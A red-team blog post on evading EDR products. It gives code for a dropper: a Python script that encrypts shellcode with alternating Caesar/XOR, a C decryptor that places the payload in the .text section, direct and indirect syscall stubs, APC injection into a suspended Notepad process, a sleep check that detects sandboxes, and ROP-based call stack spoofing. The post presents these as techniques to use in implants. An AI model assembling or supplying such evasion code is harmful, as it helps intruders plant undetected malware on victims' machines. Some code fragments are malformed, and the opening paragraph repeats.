14 min readJust now
–
With the threat landscape evolving quickly, security software vendors have had to adapt in a number of ways. Antivirus solutions have failed to keep pace with new technologies and haven’t provided enough adequate protections to catch sophisticated attackers. The advancement in technologies has ushered in new security solutions identified as Endpoint Detection and Response (EDR) software. While each EDR solution has its own “secret sauce” when it comes to how it executes its defensive mechanisms, most operate through comparable methods. For example, many EDR software solutions have implemented techniques to include Userland Hooking, Memory Scanning, Static Detection, and Heuristic Detection. These techniques all operate in a similar manner from product to pro…
14 min readJust now
–
With the threat landscape evolving quickly, security software vendors have had to adapt in a number of ways. Antivirus solutions have failed to keep pace with new technologies and haven’t provided enough adequate protections to catch sophisticated attackers. The advancement in technologies has ushered in new security solutions identified as Endpoint Detection and Response (EDR) software. While each EDR solution has its own “secret sauce” when it comes to how it executes its defensive mechanisms, most operate through comparable methods. For example, many EDR software solutions have implemented techniques to include Userland Hooking, Memory Scanning, Static Detection, and Heuristic Detection. These techniques all operate in a similar manner from product to product, leading to software agnostic bypasses that are effective against a number of products.
This blog post covers some of the EDR evasion techniques I’ve found most useful while developing software for my current position as a Maveris Red Team Operator. It is written with the assumption that the reader has some knowledge of coding in both high and low level languages, and awareness of basic evasion components such as Position Independent Code (PIC). References to a “Dropper” or “Implant” refer to the software responsible for establishing C2 sessions or beacons.
Encryption and IOCs
We’ll begin by looking into how to make use of the PIC while evading static detection.
First, let’s look at the anatomy of our droppers. A typical vanilla dropper performs API calls for the following actions:
- The implant allocates writable memory for Shellcode..
- The implant writes the Shellcode to the reserved memory
- The implant sets protections on the memory region to options which look more benign(i.e. RX instead of WRX)
- The implant executes the Shellcode There are many different API calls that can be used to carry this out, with some of the most basic being VirtualAlloc, WriteProcessMemory, VirtualProtect and CreateThread. These API calls perform the actions above with the PIC generated, but can’t utilize the PIC without falling victim to antivirus static detection. So how can we successfully utilize the PIC we generated within the implant?
By encrypting or obfuscating it, we can bypass static detection. There are an infinite number of ways to perform this encryption, and the more creative you get, the better. Typical methods include:
- Caesar Ciphers
- XOR Key Encryption
- AES Encryption These are all great options, if you make use of them in a non-conventional way. Alternating from byte to byte with Caesar Cipher/ XOR Key encryption is an example of an extension of common encryption methods that can be used to circumvent static detection. This python script below performs this by taking in raw PIC in a .bin format, and outputs a .c file with output you can utilize in your implant.
import sysimport osdef alternate_encrypt(data, caesar_shifts, xor_keys): result = bytearray(data) for i in range(len(data)): if i % 2 == 0: # Even indices: Caesar cipher shift = caesar_shifts[i % len(caesar_shifts)] result[i] = (data[i] + shift) % 256 else: # Odd indices: XOR key = xor_keys[i % len(xor_keys)] result[i] = data[i] ^ key return resultdef format_for_c_string(data, var_name, bytes_per_line=16): output = f"unsigned char {var_name}[] = \"" for i in range(len(data)): if i > 0 and i % bytes_per_line == 0: output += "\"\n \"" output += f"\\x{data[i]:02x}" output += "\";" return outputdef main(): if len(sys.argv) != 3: print("Usage: python encrypt_bin.py <input.bin> <output.c>") sys.exit(1) input_file = sys.argv[1] output_file = sys.argv[2] # Read input .bin file try: with open(input_file, "rb") as f: data = bytearray(f.read()) except FileNotFoundError: print(f"Error: Input file '{input_file}' not found.") sys.exit(1) # Define encryption parameters caesar_shifts = [3, 7, 11] # Alternating shifts for Caesar cipher xor_keys = [0x5A, 0x3C, 0x7F] # XOR keys for multiple byte XOR # Apply encryption encrypted = alternate_encrypt(data, caesar_shifts, xor_keys) # Format as C string c_string = format_for_c_string(encrypted, "encrypted_data") # Write to output .c file try: with open(output_file, "w") as f: f.write(c_string) print(f"Encrypted data written to '{output_file}'") print(f"Encrypted data length: {len(encrypted)} bytes") except Exception as e: print(f"Error writing output file: {e}") sys.exit(1)if __name__ == "__main__": main()
AES encryption may also seem like a great option, but the libraries that perform AES encryption may be an IOC (Indicator of compromise) when loaded by your implant. To avoid this, a custom crypto implementation can be used to circumvent having to load crypto libraries. A great implementation of custom AES encryption, and how to implement it into your project can be found here: https://github.com/kokke/tiny-AES-c
So now we’ll need to implement a decryption routine for the Shellcode, restoring it to its original contents, so that it properly executes when it reaches the CPU. Here is an example of how that decryption routine might look if we were to implement the encryption solution previously mentioned.
void alternate_decrypt(unsigned char *data, size_t len, const int *caesar_shifts, size_t shifts_len, const unsigned char *xor_keys, size_t keys_len) { for (size_t i = 0; i < len; i++) { if (i % 2 == 0) { int shift = caesar_shifts[i % shifts_len]; data[i] = (data[i] - shift + 256) % 256; } else { unsigned char key = xor_keys[i % keys_len]; data[i] ^= key; } }}unsigned char encrypted_data[] __attribute__((section(".text"))) = "\xff\x74\...f"const int caesar_shifts[] = {3, 7, 11};const size_t shifts_len = 3;const unsigned char xor_keys[] = {0x5A, 0x3C, 0x7F};const size_t keys_len = 3;size_t data_len = sizeof(encrypted_data) - 1alternate_decrypt(encrypted_data, data_len, caesar_shifts, shifts_len, xor_keys, keys_len);
This is an example of how the decryption routine might work for your encrypted Shellcode. You would simply need to replace \xff\x74… with the encrypted Shellcode generated by the python script.
Payload Location — Unbacked Executable Memory
Now you may be familiar with vanilla droppers and ask yourself what
__attribute__((section(".text")))
is doing to the code. If you’re well acquainted with the PE (Portable Executable) format, you will recognize the .text section. Essentially, .text is a section of an executable that contains the executable instructions. This may seem counter intuitive, since “text” in most contexts refers to something completely different, but with a little bit of digging into the structure of a PE file, you can validate this. In this example, we’ve written our Shellcode to the .text section of our implant to make the executable Shellcode look more organic to memory scanners. When you use VirtualAlloc or VirtualAllocEx to allocate memory for the Shellcode, the memory region is marked as private memory, and when marked as executable, it becomes a major IOC because it isn’t backed by a module on disk. Below are examples of Moneta and Process hacker showing these detections.
While some memory scanners can detect that we’ve made modifications to the .text section as the Shellcode decrypts, a good number of EDR solutions may find it to be less conspicuous than private executable unbacked memory. This technique also avoids having to allocate memory, and instead, uses the VirtualProtect API to temporarily change permissions on a portion of the .text section so that the payload can be decrypted before reverting it back to its executable state.
Userland Hooks
As previously mentioned, API calls are made to perform operations within the implant. These Windows APIs call their corresponding lower level undocumented APIs within NTDLL.dll. In an effort to detect malicious use of these APIs, many EDR solutions hook the lower level APIs located in NTDLL.dll because it is the last stop the API calls make before calling into the kernel. These hooks are simply assembly opcodes, like JMP instructions, which redirect the code execution of the NTAPIs to code which performs an inspection of NTAPIs usage. This allows the EDR software to identify malicious usage of these APIs and mitigate risk through defensive action.
Since these hooks are all in userland, where we have read/write access to the memory, there are a number of ways we can get around them.
- We could load a completely new copy of NTDLL and have it overwrite the hooked copy.
- We could unhook the APIs.
- If we don’t want to interact with the filesystem, we can start a suspended process and copy the unhooked NTDLL from the process over our hooked DLL. This technique is known as “Peruns Fart” and is detailed in a number of repositories like this one: https://github.com/plackyhacker/Peruns-Fart.
- We can opt for usage of indirect and direct syscalls. When using direct syscalls, we use functions that make use of an assembly stub, purposed for loading the syscall number into the respective register, and then perform a syscall instruction. This calls directly into the kernel, rather than relying on the NTAPI in NTDLL.dll to execute its SYSCALL instruction. Below is an example of what the assembly stub would look like.
mov r10, rcxmov eax, [wSystemCall]syscallret
- Indirect syscalls are similar, but rather than making a direct syscall in the assembly stub, we jump to the SYSCALL instruction in the NTDLL.dll that corresponds to our NTAPI call. As shown below, we can do this with a similar assembly stub.
EXTERN JMPADDR...mov r10, rcxmov eax, [wSystemCall]jmp [JMPADDR]ret
This looks more normal to the EDR as the SYSCALL instruction will have originated from an expected location. There is an amazing project called Syswhispers which greatly simplifies the process https://github.com/klezVirus/SysWhispers3
This brings us to the next problem. Syscall numbers change from version to version. Also, EDRs may make it harder to identify what syscall number corresponds to what NTAPI call, as they modify the code sections which make these calls into the kernel. However, not all functions in NTDLL are hooked, and the order in which these functions appear in memory parallels their syscall numbers, allowing us to data mine syscall numbers from neighboring API stubs. This technique can be seen in the Halo’s Gate project, which you can learn more about here: https://blog.sektor7.net/#!res/2021/halosgate.md. In Halo’s Gate, memory is iteratively searched to locate a syscall stub, which is then used to identify the syscall number for a certain API call. If the function is hooked and no syscall number is found, it looks to neighboring functions until it finds one with a syscall number, then calculates the syscall number of the syscall we’re trying to use.
Once these syscall numbers are resolved, they can be loaded into the appropriate register before executing the SYSCALL instruction. This can be done either from your own assembly stub(Direct Syscall), or the SYSCALL instruction located in the normal execution path(Indirect Syscall). Identifying this SYSCALL instruction address can be as simple as making use of the code below. This code identifies the location of NtCreateThreadEx in NTDLL.dll, and adds an offset to it. The result corresponds to the SYSCALL assembly instruction of the API call:
UINT_PTR pointerNtCreateThreadEx = (UINT_PTR)GetProcAddress(hNtdll, "NtCreateThreadEx");UINT_PTR syscallAddressNtCreateThreadEx = pointerNtCreateThreadEx + 0x12;JMPADDR=syscallAddressNtCreateThreadEx;
Once this address is calculated, a simple jump to it after loading up the registers can perform the indirect syscall with the previously mentioned assembly stub.
Syswhispers also dynamically resolves these Syscall numbers, so using both techniques would be redundant.
Process Injection
Another technique that may prove useful is process injection. While kernel telemetry will identify that a remote thread from another process has been started, this could help our implant evade detections, as the hosting process may help C2 traffic and heuristics look more legitimate. Below is example code which spawns a suspended Notepad process, purposed for our shellcode injection. The keen eye may notice that non-Microsoft DLLs have been blocked from loading into the process. This may help in preventing EDR DLLs from being loaded into the process and may circumvent detections.
PROCESS_INFORMATION pi = {};STARTUPINFOEXA si = {};SIZE_T attributeSize = 0; InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize); PPROC_THREAD_ATTRIBUTE_LIST attributes = (PPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, attributeSize);DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON; 0x100000000000;UpdateProcThreadAttribute(attributes, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL); si.lpAttributeList = attributes;CreateProcessA((LPSTR)"C:\\windows\\system32\\notepad.exe", NULL, NULL, NULL, EXTENDED_STARTUPINFO_PRESENT, CREATE_SUSPENDED | CREATE_NO_WINDOW, NULL, "C:\\Windows\\System32\\", &si.StartupInfo, &pi))
We’ve chosen Notepad in this particular example, although some other host processes may better suit C2 implant purposes. For example, if your implant is using https, it may make more sense to inject into a browser process so that network monitors don’t think the traffic is anomalous. It is also important to keep in mind the architecture of the process. Injecting x64 shellcode into an x86 process will likely cause it to crash. Below is example code utilizing Syswhispers3 for calling the APIs.
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, attributes);allocation_start = VirtualAllocExNuma(pi.hProcess, NULL, allocation_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE, 0);status = Sw3NtWriteVirtualMemory(pi.hProcess, allocation_start, (PVOID)shellcode, allocation_size, nullptr);DWORD oldProtect;status = Sw3NtProtectVirtualMemory(pi.hProcess, &allocation_start, &allocation_size, PAGE_EXECUTE_READ, &oldProtect);Sw3NtQueueApcThread(pi.hThread, (PKNORMAL_ROUTINE)allocation_start, NULL, NULL, NULL);Sw3NtResumeThread(pi.hThread, 0);
Non-Emulated API
You may have noticed that in the code above, we utilized VirtualAllocExNuma rather than utilizing Syswhispers and the common VirtualAllocEx API call. This is because VirtualAllocExNuma is a non-emulated API and may cause emulated execution to fail before our implant does its thing. The failure can be useful to evade detection, as detection solutions generally emulate the execution of a binary and look into its heuristics to determine whether it is doing anything malicious. More details can be found here: https://redfoxsecurity.medium.com/antivirus-evasion-26a30f072f76
Sleep Timers
In addition to non-emulated APIs, you may see sleep timers used in malware with a conditional exit based on whether a certain time period has gone by. This is because emulation typically speeds through sleep functions so that the user experience isn’t impacted by the defensive mechanism. This allows us to use these timers as a litmus test to see whether the execution is being emulated for detection purposes, and if it is, we can cause the program to exit before malicious action is detected. This can be utilized in every programming language. Here is a C# example:
DateTime t1 = DateTime.Now; Sleep(2000); double t2 = DateTime.Now.Subtract(t1).TotalSeconds; if(t2 < 1.5) { return; }
More details about different ways to delay execution and their detections can be found here: https://www.malwation.com/blog/simplest-yet-most-common-and-effective-evasion-tactic-sleep
QueueApcThread
Using QueueApcThread may be a better option than using the CreateRemoteThread API call. Both are now monitored by most EDR solutions, but CreateRemoteThread is the more obvious of the two. In our example code that utilized syswhispers and made API calls, we’ve spawned our Notepad process suspended, set a thread to to be executed, and then resumed the process. This should result in our Shellcode being executed, and render a beacon in the context of the hosting process. More details can be found here: https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection
Call Stack Spoofing
EDRs look at call stacks to determine if they look legitimate, and if they don’t, they take defensive action. Executing our implant can cause the execution on the call stack to look abnormal. For example, when our vanilla implant attempts to create a thread, the call stack shows values of executable memory that is unbacked by a module on disk. This is a major IOC, and would likely get detected by EDR software. As you can see below, the memory addresses below don’t align with normal execution.
It is worth noting that the entire stack is in userland, so we can modify it to look legitimate. To make the call stack look more organic, we can look into what a normal call stack looks like in a Notepad process.
Observing the contents in our debugger, we observe these call stack values on the stack
These look to be values we can mimic to make our call stack look legitimate. In order to do this, we begin by data mining function prologues and epilogues for stack size information.
Having found the stack size, we now know where the return address resides on the stack. Overwriting this value will allow us to manually spoof our call stack. Below, you will see we have copied the previous entry’s address at an offset of 0x80, which is the value we data mined from the function prologue. This results in duplicate entries in the call stack.
We can utilize this technique to write values to return address locations which look innocuous, all in an effort to hide malicious code execution. Below, we see that we have spoofed our call stack and made it look like a normal call stack when executing our modified implant/dropper.
ROP Gadget
We’ve made use of a ROP gadget to bounce our execution off of a legitimate module to further make our call stack look legitimate, and also utilized the fact that a 0 as a return address allows for omissions within the call stack entries.
As an example of how part of this method works under the hood, we will look at how this could be implemented.
First, we locate a ROP Gadget in a legitimate module. In our example, we found a call r12 gadget in NTDLL.dll
Next, we load the address of the function we intend to spoof into a register. In this example, we have passed this address as a parameter to our function so that it gets stored in the rcx register.
mov r10, rcx
Then we load the stack-and-register-restoring function that we intend on calling with our ROP gadget into a register.
lea r12, Restore
Now we write the address of a call r12 ROP gadget to the stack. In our example, we passed this address as a parameter to our function again, so it is located in the r8 register.
mov [rsp], r8
Next, after allocating some code to handle parameters, we jump to the intended spoofed function’s address
jmp r10
And when the spoofed function returns, it will look to the stack for our return value of our ROP gadget. Subsequently, this will run our Restore function and allow for the proper continuation of execution, along with a patched call stack.
Restore: ← Restore registers and stack frame → ret
This will cause an entry in the call stack to be that of our ROP gadget. Since this ROP gadget is located in a legitimate module, it will look organic in the call stack.
It is necessary to patch the stack, as previously done, to hide our nefarious intent. To locate the return addresses on the stack, we can look for UNWIND_CODEs in the .pdata section. Once this is done, we can manipulate the call stack to look benign and execute code to our liking. A great implementation on how to do this can be found in this project: https://github.com/WithSecureLabs/CallStackSpoofer
Another good implementation using another gadget to stack spoof can be found here: https://github.com/susMdT/LoudSunRun
Summary
It seems that AV/EDR evasion is a cat and mouse game, and both security researchers and threat actors constantly come up with new innovative ways to evade defenses. There are a seemingly countless number of variations to certain evasion techniques and developing detection mechanisms has become increasingly difficult to do without impacting legitimate usage of regular programs. To wrap things up, those are some of my favorite techniques for EDR evasion, and I hope this article has been to your liking. :)
Maveris is an IT and cybersecurity company committed to helping organizations create secure digital solutions to accelerate their mission. We are Veteran-owned and proud to serve customers across the Federal Government and private sector. Maveris Labs is a space for employees and customers to ask and explore answers to their burning “what if…” questions and to expand the limits of what is possible in IT and cybersecurity. To learn more, go tomaveris.com